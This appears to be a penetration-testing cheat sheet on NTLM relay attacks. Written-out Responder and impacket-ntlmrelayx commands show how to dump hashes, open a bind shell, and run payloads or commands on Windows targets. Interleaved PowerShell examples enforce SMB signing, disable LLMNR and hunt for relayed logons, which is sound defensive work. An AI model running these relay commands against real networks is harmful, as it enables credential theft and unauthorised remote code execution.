
Relay Attacks

https://blog.fox-it.com/2017/05/09/relaying-credentials-everywhere-with-ntlmrelayx/

Relay forwards captured NTLM authentication to a target machine to obtain various types of access.
- Only works if SMB signing on the target is disabled or "not required"
- The relayed credentials MUST be a local admin on the target machine
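The two preconditions above are also the defender's checklist. The following is an added example, not part of the original notes, showing how to audit and enforce the SMB signing requirement on a single Windows host with the built-in SmbShare cmdlets, and how to turn off the LLMNR answers that Responder relies on to get the first authentication attempt. It assumes an elevated PowerShell session on Windows 8 / Server 2012 or later; in a domain the same settings are normally pushed by Group Policy rather than set per host.

```powershell
# Added example (not from the original notes): audit and enforce SMB signing,
# the setting whose absence makes the relay above possible.
# Assumes an elevated session on Windows 8 / Server 2012 or later.

$server = Get-SmbServerConfiguration   # inbound SMB (what ntlmrelayx targets)
$client = Get-SmbClientConfiguration   # outbound SMB (what Responder lures)

"Server signing required : $($server.RequireSecuritySignature)"
"Server signing enabled  : $($server.EnableSecuritySignature)"
"Client signing required : $($client.RequireSecuritySignature)"

# "Enabled" alone still negotiates unsigned sessions with peers that do not ask
# for signing; only "Required" closes the relay path on this host.
if (-not $server.RequireSecuritySignature) {
    Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
}
if (-not $client.RequireSecuritySignature) {
    Set-SmbClientConfiguration -RequireSecuritySignature $true -Force
}

# Responder gets its first authentication by answering LLMNR name lookups.
# EnableMulticast = 0 under the DNSClient policy key disables LLMNR on this host.
$llmnrKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'
if (-not (Test-Path $llmnrKey)) { New-Item -Path $llmnrKey -Force | Out-Null }
Set-ItemProperty -Path $llmnrKey -Name 'EnableMulticast' -Value 0 -Type DWord

# Re-read to confirm the change took effect
(Get-SmbServerConfiguration).RequireSecuritySignature
(Get-ItemProperty -Path $llmnrKey).EnableMulticast
```

Requiring signing on the server side is what stops the relay against that host; requiring it on the client side prevents the host's own outbound sessions from being downgraded. Both default to "required" only on domain controllers, which is why ordinary member servers and workstations are the usual targets in targets.txt.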

Responder + ntlmrelayx


Edit the Responder config and turn off its SMB and HTTP servers, so that ntlmrelayx can listen on those ports instead:

sudo nano /etc/responder/Responder.conf
SMB = On ---> Off
HTTP = On ---> Off

Make the targets list:

echo "<TargetIP>" > targets.txt

Run Responder:

sudo responder -I eth0 -wv

Start ntlmrelayx with any of these options:

Dump hashes
sudo impacket-ntlmrelayx -tf targets.txt -smb2support

Get a semi-interactive smbexec bind shell (connect with nc localhost 11000)
sudo impacket-ntlmrelayx -tf targets.txt -smb2support -i

Execute payload
sudo impacket-ntlmrelayx -tf targets.txt -smb2support -e payload.exe

Execute command
sudo impacket-ntlmrelayx -tf targets.txt -smb2support -c 'whoami'

Wait for an authentication attempt (or coerce one).
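On the target side, a relayed logon leaves a recognisable trace: the NTLM AUTHENTICATE message carries the victim's workstation name, but the TCP connection comes from the relaying host, so Security event 4624 records a WorkstationName that does not belong to the IpAddress. The following is an added example, not part of the original notes, that hunts for such mismatches on a Windows host. It assumes an elevated session (the Security log is not readable otherwise) and that internal workstation names resolve through DNS; the 5000-event window is an arbitrary constructed limit.

```powershell
# Added example (not from the original notes): flag NTLM network logons whose
# source address does not belong to the workstation name the client claimed.
# Assumes an elevated session and DNS-resolvable internal hostnames.

$events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624 } `
    -MaxEvents 5000 -ErrorAction SilentlyContinue

$suspicious = foreach ($ev in $events) {
    # Flatten the EventData <Data Name="..."> elements into a hashtable
    $x = [xml]$ev.ToXml()
    $d = @{}
    foreach ($item in $x.Event.EventData.Data) { $d[$item.Name] = $item.'#text' }

    # Only network logons (type 3) authenticated with NTLM can be relayed
    if ($d.LogonType -ne '3' -or $d.AuthenticationPackageName -ne 'NTLM') { continue }
    if ($d.IpAddress -in @('-', '127.0.0.1', '::1')) { continue }
    if ([string]::IsNullOrEmpty($d.WorkstationName)) { continue }

    try {
        $resolved = [System.Net.Dns]::GetHostAddresses($d.WorkstationName) |
            ForEach-Object { $_.IPAddressToString }
    } catch {
        $resolved = @()   # unresolvable name: still report, it may be fabricated
    }

    if ($d.IpAddress -notin $resolved) {
        [pscustomobject]@{
            Time        = $ev.TimeCreated
            User        = "$($d.TargetDomainName)\$($d.TargetUserName)"
            Workstation = $d.WorkstationName
            SourceIP    = $d.IpAddress
            ResolvedTo  = ($resolved -join ',')
        }
    }
}

$suspicious | Sort-Object Time | Format-Table -AutoSize
```

Expect some benign hits from NAT, VPN concentrators and multi-homed hosts; the strong signal is an admin account logging on from an address that is not a managed Windows machine, shortly followed by service installation or SAM access on the same host, which is exactly what the dump, shell and command options above produce.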